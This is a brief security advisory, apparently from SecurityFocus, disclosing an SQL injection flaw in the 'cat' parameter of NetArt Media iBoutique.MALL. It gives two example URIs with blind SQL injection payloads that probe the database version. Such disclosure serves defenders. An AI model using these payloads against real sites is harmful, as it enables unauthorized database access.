NetArt Media iBoutique.MALL 'cat' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/[path]/index.php?mod=products&cat=230+and+substring(@@version,1,1)=5
http://www.example.com/[path]/index.php?mod=products&cat=230+and+substring(@@version,1,1)=4


 

Privacy Statement
Copyright 2010, SecurityFocus